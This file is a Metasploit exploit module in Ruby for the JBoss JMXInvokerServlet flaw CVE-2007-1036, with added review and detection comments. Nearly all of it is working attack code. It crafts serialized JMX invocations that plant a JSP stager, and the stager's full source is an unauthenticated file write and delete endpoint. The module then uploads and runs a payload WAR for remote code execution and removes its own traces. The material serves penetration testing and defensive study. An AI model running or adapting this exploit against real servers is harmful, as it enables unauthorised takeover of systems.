  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Matched against the HTTP server fingerprint before the module runs.
  HttpFingerprint = { :pattern => [ /JBoss/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and user-facing options.
  #
  # Options registered here:
  #   RPORT     - defaults to 8080
  #   JSP       - optional JSP name; #exploit generates a random one when unset
  #   APPBASE   - optional application base name; random when unset
  #   TARGETURI - path of the invoker servlet; every serialized request built by
  #               this module is POSTed to it (see #send_serialized_request)
  #
  # From a defender's point of view the description below names the underlying
  # condition: the JMX invoker servlet is reachable without authentication, and
  # the jboss.admin:service=DeploymentFileRepository MBean lets a caller write
  # files into the deploy directory.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
      'Description' => %q{
This module can be used to execute a payload on JBoss servers that have an
exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
to finally upload the selected payload to the target. The DeploymentFileRepository
methods are only available on Jboss 4.x and 5.x.
},
      'Author' => [
        'Patrick Hof', # Vulnerability discovery, analysis and PoC
        'Jens Liebchen', # Vulnerability discovery, analysis and PoC
        'h0ng10' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2007-1036' ],
          [ 'OSVDB', '33744' ],
          [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
        ],
      'DisclosureDate' => 'Feb 20 2007',
      'Privileged' => true,
      'Platform' => %w{ java linux win },
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Targets' =>
        [
          # 'Automatic' runs target detection (#auto_target) but falls back to
          # the Java platform/arch declared here.
          [ 'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
            },
          ],
          #
          # Platform specific targets
          #
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            },
          ],
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
        ],
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
        OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
        OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),
      ], self.class)
  end

  # Fingerprints the target by requesting the server's Version attribute
  # through the invoker servlet.
  #
  # @return [Exploit::CheckCode] Unknown when no usable response came back,
  #   Appears when the body carries a JBoss 4.x/5.x tag or the request provoked
  #   a ServletException (servlet reachable, version unsupported), Safe otherwise.
  def check
    res = send_serialized_request('version')
    if res.nil?
      vprint_error('Connection timed out')
      return Exploit::CheckCode::Unknown
    elsif res.code != 200
      # NOTE(review): #send_serialized_request already returns nil for any
      # response whose code is not 200, so this branch looks unreachable.
      vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
      return Exploit::CheckCode::Unknown
    end

    # Check if the version is supported by this exploit
    return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/
    return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/
    return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/

    if res.body =~ /ServletException/ # Simple check, if we caused an exception.
      vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Main flow:
  #   1. pick a target (auto-detection for 'Automatic', otherwise the chosen one)
  #   2. deploy a small JSP stager via the DeploymentFileRepository 'store' call
  #   3. call the stager so JBoss deploys it, then POST the base64 WAR holding
  #      the payload to it (the stager writes the WAR into the deploy directory)
  #   4. call the payload JSP, then ask the stager to delete the WAR
  #   5. remove the stager file and its directory again
  #
  # On the wire this is a POST to TARGETURI carrying a serialized
  # MarshalledInvocation, followed by plain GET/POST requests to the randomly
  # named JSPs; the stager and payload WARs are written under the server's
  # jboss.server.home.dir/deploy (see #generate_stager).
  #
  # NOTE(review): the return values of #call_uri_mtimes and of the stager
  # upload are not checked, so the flow continues (and still attempts cleanup)
  # even if an earlier step failed. If the run is interrupted before the
  # removal steps, the stager remains deployed on the target.
  def exploit
    mytarget = target
    if target.name =~ /Automatic/
      mytarget = auto_target
      fail_with(Failure::BadConfig, 'Unable to automatically select a target') unless mytarget
      print_status("Automatically selected target: \"#{mytarget.name}\"")
    else
      print_status("Using manually select target: \"#{mytarget.name}\"")
    end

    # We use a already serialized stager to deploy the final payload
    regex_stager_app_base = rand_text_alpha(14)
    regex_stager_jsp_name = rand_text_alpha(14)
    # Random names for the two request parameters the stager understands
    # (see #generate_stager): the WAR name and its base64 content.
    name_parameter = rand_text_alpha(8)
    content_parameter = rand_text_alpha(8)
    stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
    replace_values = {
      'regex_app_base' => regex_stager_app_base,
      'regex_jsp_name' => regex_stager_jsp_name,
      'jsp_code' => generate_stager(name_parameter, content_parameter)
    }

    print_status('Deploying stager')
    send_serialized_request('installstager', replace_values)

    print_status("Calling stager: #{stager_uri}")
    call_uri_mtimes(stager_uri, 5, 'GET')

    # Generate the WAR with the payload which will be uploaded through the stager
    app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
    jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
    war_data = payload.encoded_war({
      :app_name => app_base,
      :jsp_name => jsp_name,
      :arch => mytarget.arch,
      :platform => mytarget.platform
    }).to_s
    b64_war = Rex::Text.encode_base64(war_data)

    print_status("Uploading payload through stager")
    # NOTE(review): `res` is assigned here and below but never read.
    res = send_request_cgi({
      'uri' => stager_uri,
      'method' => "POST",
      'vars_post' =>
        {
          name_parameter => app_base,
          content_parameter => b64_war
        }
    })

    payload_uri = "/#{app_base}/#{jsp_name}.jsp"
    print_status("Calling payload: " + payload_uri)
    res = call_uri_mtimes(payload_uri,5, 'GET')

    # Remove the payload through stager
    print_status('Removing payload through stager')
    delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
    res = send_request_cgi({'uri' => delete_payload_uri})

    # Remove the stager
    print_status('Removing stager')
    send_serialized_request('removestagerfile', replace_values)
    send_serialized_request('removestagerdirectory', replace_values)

    handler
  end

  # Builds the JSP stager source. All Java identifiers inside it are randomised.
  #
  # Behaviour of the generated JSP (as written in the template below):
  #   - when the request carries `content_param`: base64-decodes it and writes
  #     the bytes to <jboss.server.home.dir>/deploy/<name_param>.war
  #   - otherwise: deletes <jboss.server.home.dir>/deploy/<name_param>.war
  #   - every exception is swallowed (`catch(Exception e) {}`), so the caller
  #     gets no indication of failure.
  #
  # NOTE(review): while deployed, this JSP is an unauthenticated file write /
  # delete endpoint on the target; the module relies on the removal steps at
  # the end of #exploit to take it down again. It also imports
  # sun.misc.BASE64Decoder, a JDK-internal class - presumably fine on the
  # JBoss 4.x/5.x era JDKs this module targets.
  #
  # @param name_param [String] request parameter carrying the WAR base name
  # @param content_param [String] request parameter carrying the base64 WAR
  # @return [String] the JSP source
  def generate_stager(name_param, content_param)
    war_file = rand_text_alpha(4+rand(4))
    file_content = rand_text_alpha(4+rand(4))
    jboss_home = rand_text_alpha(4+rand(4))
    decoded_content = rand_text_alpha(4+rand(4))
    path = rand_text_alpha(4+rand(4))
    fos = rand_text_alpha(4+rand(4))
    name = rand_text_alpha(4+rand(4))
    file = rand_text_alpha(4+rand(4))

    # `<<-EOT` keeps the leading whitespace of the body lines as part of the
    # JSP text, so the template is left exactly as it appears in the listing.
    stager_script = <<-EOT
<%@page import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"
%>
<%
String #{file_content} = "";
String #{war_file} = "";
String #{jboss_home} = System.getProperty("jboss.server.home.dir");
if (request.getParameter("#{content_param}") != null){
try {
#{file_content} = request.getParameter("#{content_param}");
#{war_file} = request.getParameter("#{name_param}");
byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});
String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";
FileOutputStream #{fos} = new FileOutputStream(#{path});
#{fos}.write(#{decoded_content});
#{fos}.close();
}
catch(Exception e) {}
}
else {
try{
String #{name} = request.getParameter("#{name_param}");
String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";
new File(#{file}).delete();
}
catch(Exception e) {}
}
%>
    EOT
  end

  # Serialises one of the predefined invocations and POSTs it to TARGETURI.
  #
  # @param operation [String] one of 'version', 'osname', 'osarch',
  #   'installstager', 'removestagerfile', 'removestagerdirectory'; anything
  #   else aborts the module via fail_with
  # @param replace_params [Hash] values for the stager operations, keyed by
  #   'regex_app_base', 'regex_jsp_name' and 'jsp_code'
  # @return [Rex::Proto::Http::Response, nil] the response when it has code
  #   200, nil otherwise (after printing an error)
  #
  # Detection note: the request is a POST to the invoker servlet path whose
  # body is a Java serialization stream. The header key is sent literally as
  # written below, i.e. 'ContentType:' (with the trailing colon) rather than
  # the usual 'Content-Type'.
  def send_serialized_request(operation , replace_params = {})
    data = ''
    case operation
    when 'version'
      data = build_get_version.encode
    when 'osname'
      data = build_get_os.encode
    when 'osarch'
      data = build_get_arch.encode
    when 'installstager'
      data = build_install_stager(
        war_name: replace_params['regex_app_base'],
        jsp_name: replace_params['regex_jsp_name'],
        data: replace_params['jsp_code']
      ).encode
    when 'removestagerfile'
      # Deletes <app_base>.war/<jsp_name>.jsp
      data = build_delete_stager_file(
        dir: "#{replace_params['regex_app_base']}.war",
        file: replace_params['regex_jsp_name'],
        extension: '.jsp'
      ).encode
    when 'removestagerdirectory'
      # Deletes ./<app_base>.war itself
      data = build_delete_stager_file(
        dir: './',
        file: replace_params['regex_app_base'],
        extension: '.war'
      ).encode
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected operation")
    end

    # 25-second timeout for the invoker call
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'data' => data,
      'headers' =>
        {
          'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
          'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'
        }
    }, 25)

    unless res && res.code == 200
      print_error("Failed: Error requesting preserialized request #{operation}")
      return nil
    end

    res
  end

  # Requests `uri` repeatedly until it answers with 200, waiting 5 seconds
  # between attempts (JBoss needs a moment to deploy a freshly written WAR).
  #
  # @param uri [String] path to request
  # @param num_attempts [Integer] maximum number of tries
  # @param verb [String, nil] "POST" sends `data` as the body with a 5 s
  #   timeout; any other value issues the request with `verb` as method and a
  #   30 s timeout, appending `data` as a query string when given
  # @param data [String, nil] body or query string, see `verb`
  # @return [Rex::Proto::Http::Response, nil] the 200 response, or the last
  #   response (possibly nil) once all attempts are exhausted
  #
  # NOTE(review): two edge cases visible in the loop body: (1) for the non-POST
  # path `uri += "?#{data}"` re-appends the query string on every retry, so a
  # second attempt requests "...?data?data" (not triggered by this module,
  # which never passes `data`); (2) a 2xx code other than 200 leaves `msg` nil
  # and `msg << ...` / print_error(msg) then fail on nil.
  def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
    # JBoss might need some time for the deployment. Try 5 times at most and
    # wait 5 seconds inbetween tries
    num_attempts.times do |attempt|
      if verb == "POST"
        res = send_request_cgi(
          {
            'uri' => uri,
            'method' => verb,
            'data' => data
          }, 5)
      else
        uri += "?#{data}" unless data.nil?
        res = send_request_cgi(
          {
            'uri' => uri,
            'method' => verb
          }, 30)
      end

      msg = nil
      if res.nil?
        msg = "Execution failed on #{uri} [No Response]"
      elsif res.code < 200 || res.code >= 300
        msg = "http request failed to #{uri} [#{res.code}]"
      elsif res.code == 200
        vprint_status("Successfully called '#{uri}'")
        return res
      end

      if attempt < num_attempts - 1
        msg << ', retrying in 5 seconds...'
        vprint_status(msg)
        # Kernel#select with no descriptors: sleep for 5 seconds
        select(nil, nil, nil, 5)
      else
        print_error(msg)
        return res
      end
    end
  end

  # Picks the first target whose 'Platform' and 'Arch' match what
  # #detect_platform / #detect_architecture report.
  #
  # @return [Msf::Module::Target, nil] nil when detection failed or no target matches
  def auto_target
    print_status('Attempting to automatically select a target')

    plat = detect_platform
    arch = detect_architecture
    return nil unless arch && plat

    # see if we have a match
    targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }

    # no matching target found
    return nil
  end

  # Try to autodetect the target platform
  #
  # Queries the OSName attribute; Linux and FreeBSD both map to 'linux',
  # Windows to 'win'.
  #
  # @return [String, nil] 'linux', 'win' or nil when nothing matched
  #
  # NOTE(review): #send_serialized_request returns nil on any failure, and
  # `res.body` is dereferenced without a nil check here.
  def detect_platform
    print_status('Attempting to automatically detect the platform')

    res = send_serialized_request('osname')

    if res.body =~ /(Linux|FreeBSD|Windows)/i
      os = $1
      if os =~ /Linux/i
        return 'linux'
      elsif os =~ /FreeBSD/i
        return 'linux'
      elsif os =~ /Windows/i
        return 'win'
      end
    end

    nil
  end

  # Try to autodetect the architecture
  #
  # Queries the OSArch attribute; only i386/x86 is recognised.
  #
  # @return [String, nil] ARCH_X86 or nil
  #
  # NOTE(review): same missing nil check on `res` as in #detect_platform.
  def detect_architecture
    print_status('Attempting to automatically detect the architecture')

    res = send_serialized_request('osarch')

    if res.body =~ /(i386|x86)/i
      arch = $1
      if arch =~ /i386|x86/i
        return ARCH_X86
        # TODO, more
      end
    end

    nil
  end

  # Serialized invocation reading the 'Version' attribute of the
  # jboss.system:type=Server MBean.
  #
  # @return [Rex::Java::Serialization::Model::Stream] the wrapped invocation
  def build_get_version
    builder = Rex::Java::Serialization::Builder.new

    # Arguments: the javax.management.ObjectName and the MBean name string
    object_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        builder.new_object(
          name: 'javax.management.ObjectName',
          serial: 0xf03a71beb6d15cf,
          flags: 3,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
        ),
        Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=Server')
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object_array
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'Version')

    build_invocation(stream)
  end

  # Serialized invocation reading the 'OSName' attribute of the
  # jboss.system:type=ServerInfo MBean.
  #
  # @return [Rex::Java::Serialization::Model::Stream] the wrapped invocation
  def build_get_os
    builder = Rex::Java::Serialization::Builder.new

    object_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        builder.new_object(
          name: 'javax.management.ObjectName',
          serial: 0xf03a71beb6d15cf,
          flags: 3,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
        ),
        Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object_array
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSName')

    build_invocation(stream)
  end

  # Serialized invocation reading the 'OSArch' attribute of the
  # jboss.system:type=ServerInfo MBean. Identical to #build_get_os apart from
  # the attribute name.
  #
  # @return [Rex::Java::Serialization::Model::Stream] the wrapped invocation
  def build_get_arch
    builder = Rex::Java::Serialization::Builder.new

    object_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        builder.new_object(
          name: 'javax.management.ObjectName',
          serial: 0xf03a71beb6d15cf,
          flags: 3,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
        ),
        Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object_array
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSArch')

    build_invocation(stream)
  end

  # Serialized invocation of DeploymentFileRepository.store with the
  # signature (String, String, String, String, boolean): WAR directory name,
  # file name, extension, file content, and a boolean that is always false.
  #
  # @param opts [Hash] :war_name (base name, '.war' is appended), :jsp_name,
  #   :extension (default '.jsp'), :data (file content, default '')
  # @return [Rex::Java::Serialization::Model::Stream] the wrapped invocation
  def build_install_stager(opts = {})
    war_name = "#{opts[:war_name]}.war"
    jsp_name = opts[:jsp_name] || ''
    extension = opts[:extension] || '.jsp'
    data = opts[:data] || ''

    builder = Rex::Java::Serialization::Builder.new

    # Target MBean and operation name
    object_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        builder.new_object(
          name: 'javax.management.ObjectName',
          serial: 0xf03a71beb6d15cf,
          flags: 3,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
        ),
        Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),
        Rex::Java::Serialization::Model::EndBlockData.new,
        Rex::Java::Serialization::Model::Utf.new(nil, 'store')
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Operation arguments, in the order of the types array below
    values_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        Rex::Java::Serialization::Model::Utf.new(nil, war_name),
        Rex::Java::Serialization::Model::Utf.new(nil, jsp_name),
        Rex::Java::Serialization::Model::Utf.new(nil, extension),
        Rex::Java::Serialization::Model::Utf.new(nil, data),
        builder.new_object(
          name: 'java.lang.Boolean',
          serial: 0xcd207280d59cfaee,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
          fields: [['boolean', 'value']],
          data: [['boolean', 0]]
        )
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Parameter type signature of the operation
    types_array = builder.new_array(
      values_type: 'java.lang.String;',
      values: [
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'boolean')
      ],
      name: '[Ljava.lang.String;',
      serial: 0xadd256e7e91d7b47,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object_array
    stream.contents << values_array
    stream.contents << types_array

    build_invocation_deploy(stream)
  end

  # Serialized invocation of DeploymentFileRepository.remove with the
  # signature (String, String, String): directory, file name, extension.
  #
  # @param opts [Hash] :dir (default ''), :file (default ''),
  #   :extension (default '.jsp')
  # @return [Rex::Java::Serialization::Model::Stream] the wrapped invocation
  def build_delete_stager_file(opts = {})
    dir = opts[:dir] || ''
    file = opts[:file] || ''
    extension = opts[:extension] || '.jsp'

    builder = Rex::Java::Serialization::Builder.new

    # Target MBean and operation name
    object_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        builder.new_object(
          name: 'javax.management.ObjectName',
          serial: 0xf03a71beb6d15cf,
          flags: 3,
          annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
        ),
        Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),
        Rex::Java::Serialization::Model::EndBlockData.new,
        Rex::Java::Serialization::Model::Utf.new(nil, 'remove')
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Operation arguments
    values_array = builder.new_array(
      values_type: 'java.lang.Object;',
      values: [
        Rex::Java::Serialization::Model::Utf.new(nil, dir),
        Rex::Java::Serialization::Model::Utf.new(nil, file),
        Rex::Java::Serialization::Model::Utf.new(nil, extension)
      ],
      name: '[Ljava.lang.Object;',
      serial: 0x90ce589f1073296c,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Parameter type signature of the operation
    types_array = builder.new_array(
      values_type: 'java.lang.String;',
      values: [
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
        Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String')
      ],
      name: '[Ljava.lang.String;',
      serial: 0xadd256e7e91d7b47,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object_array
    stream.contents << values_array
    stream.contents << types_array

    build_invocation_deploy(stream)
  end

  # Wraps an already-built argument stream into a MarshalledInvocation stream
  # for the attribute-read calls (#build_get_version, #build_get_os,
  # #build_get_arch).
  #
  # Both the argument stream and a null stream are framed as
  # <4-byte big-endian length><encoded stream><4 fixed trailer bytes> and
  # carried inside MarshalledValue objects. The remaining literal byte
  # sequences, ordinals and the integer 647347722 are fixed framing values of
  # the invocation format; their individual meanings are not documented here.
  #
  # @param stream_argument [Rex::Java::Serialization::Model::Stream]
  # @return [Rex::Java::Serialization::Model::Stream]
  def build_invocation(stream_argument)
    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []

    # length-prefixed, trailer-terminated null stream
    null_stream = build_null_stream
    null_stream_enc = null_stream.encode
    null_stream_value = [null_stream_enc.length].pack('N')
    null_stream_value << null_stream_enc
    null_stream_value << "\xfb\x57\xa7\xaa"

    # length-prefixed, trailer-terminated argument stream
    stream_argument_enc = stream_argument.encode
    stream_argument_value = [stream_argument_enc.length].pack('N')
    stream_argument_value << stream_argument_enc
    stream_argument_value << "\x7b\x87\xa0\xfb"

    stream.contents << build_marshalled_invocation
    stream.contents << Rex::Java::Serialization::Model::NullReference.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x97\x51\x4d\xdd\xd4\x2a\x42\xaf")
    stream.contents << build_integer(647347722)
    stream.contents << build_marshalled_value
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, stream_argument_value)
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
    stream.contents << build_invocation_key(5)
    stream.contents << build_marshalled_value
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x02")
    stream.contents << build_invocation_key(4)
    stream.contents << build_invocation_type(1)
    stream.contents << build_invocation_key(10)
    stream.contents << Rex::Java::Serialization::Model::NullReference.new
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new

    stream
  end

  # Wraps an argument stream into a MarshalledInvocation stream for the
  # DeploymentFileRepository operations (#build_install_stager,
  # #build_delete_stager_file).
  #
  # Differs from #build_invocation in three visible ways: a different 8-byte
  # literal after the first NullReference, the argument value is carried in a
  # BlockDataLong (the stager source can exceed a short block), and an extra
  # 'JMX_OBJECT_NAME' entry naming jboss.admin:service=DeploymentFileRepository
  # is appended after the "\x00\x00\x00\x03" block.
  #
  # @param stream_argument [Rex::Java::Serialization::Model::Stream]
  # @return [Rex::Java::Serialization::Model::Stream]
  def build_invocation_deploy(stream_argument)
    builder = Rex::Java::Serialization::Builder.new
    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []

    # length-prefixed, trailer-terminated null stream
    null_stream = build_null_stream
    null_stream_enc = null_stream.encode
    null_stream_value = [null_stream_enc.length].pack('N')
    null_stream_value << null_stream_enc
    null_stream_value << "\xfb\x57\xa7\xaa"

    # length-prefixed, trailer-terminated argument stream
    stream_argument_enc = stream_argument.encode
    stream_argument_value = [stream_argument_enc.length].pack('N')
    stream_argument_value << stream_argument_enc
    stream_argument_value << "\x7b\x87\xa0\xfb"

    stream.contents << build_marshalled_invocation
    stream.contents << Rex::Java::Serialization::Model::NullReference.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x78\x94\x98\x47\xc1\xd0\x53\x87")
    stream.contents << build_integer(647347722)
    stream.contents << build_marshalled_value
    stream.contents << Rex::Java::Serialization::Model::BlockDataLong.new(nil, stream_argument_value)
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
    stream.contents << build_invocation_key(5)
    stream.contents << build_marshalled_value
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x03")
    # Extra entry not present in #build_invocation: the MBean the call targets
    stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'JMX_OBJECT_NAME')
    stream.contents << builder.new_object(
      name: 'javax.management.ObjectName',
      serial: 0xf03a71beb6d15cf,
      flags: 3,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )
    stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository')
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << build_invocation_key(4)
    stream.contents << build_invocation_type(1)
    stream.contents << build_invocation_key(10)
    stream.contents << Rex::Java::Serialization::Model::NullReference.new
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new

    stream
  end

  # Class descriptor for org.jboss.invocation.MarshalledInvocation
  # (externalizable, block-data mode).
  #
  # @return [Object] the builder's object model for the class
  def build_marshalled_invocation
    builder = Rex::Java::Serialization::Builder.new

    builder.new_object(
      name: 'org.jboss.invocation.MarshalledInvocation',
      serial: 0xf6069527413ea4be,
      flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )
  end

  # Class descriptor for org.jboss.invocation.MarshalledValue
  # (externalizable, block-data mode); the framed streams follow it.
  #
  # @return [Object] the builder's object model for the class
  def build_marshalled_value
    builder = Rex::Java::Serialization::Builder.new

    builder.new_object(
      name: 'org.jboss.invocation.MarshalledValue',
      serial: 0xeacce0d1f44ad099,
      flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )
  end

  # org.jboss.invocation.InvocationKey object with the given int ordinal.
  #
  # @param ordinal [Integer]
  # @return [Object] the builder's object model
  def build_invocation_key(ordinal)
    builder = Rex::Java::Serialization::Builder.new

    builder.new_object(
      name: 'org.jboss.invocation.InvocationKey',
      serial: 0xb8fb7284d79385f9,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
      fields: [
        ['int', 'ordinal']
      ],
      data:[
        ['int', ordinal]
      ]
    )
  end

  # org.jboss.invocation.InvocationType object with the given int ordinal.
  #
  # @param ordinal [Integer]
  # @return [Object] the builder's object model
  def build_invocation_type(ordinal)
    builder = Rex::Java::Serialization::Builder.new

    builder.new_object(
      name: 'org.jboss.invocation.InvocationType',
      serial: 0x59a73a1ca52b7cbf,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
      fields: [
        ['int', 'ordinal']
      ],
      data:[
        ['int', ordinal]
      ]
    )
  end

  # java.lang.Integer object (with its java.lang.Number superclass descriptor)
  # holding `value`.
  #
  # @param value [Integer]
  # @return [Object] the builder's object model
  def build_integer(value)
    builder = Rex::Java::Serialization::Builder.new

    builder.new_object(
      name: 'java.lang.Integer',
      serial: 0x12e2a0a4f7818738,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
      super_class: builder.new_class(
        name: 'java.lang.Number',
        serial: 0x86ac951d0b94e08b,
        annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
      ),
      fields: [
        ['int', 'value']
      ],
      data:[
        ['int', value]
      ]
    )
  end

  # A stream containing a single null reference; used as the second
  # MarshalledValue in both invocation variants.
  #
  # @return [Rex::Java::Serialization::Model::Stream]
  def build_null_stream
    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = [Rex::Java::Serialization::Model::NullReference.new]

    stream
  end
end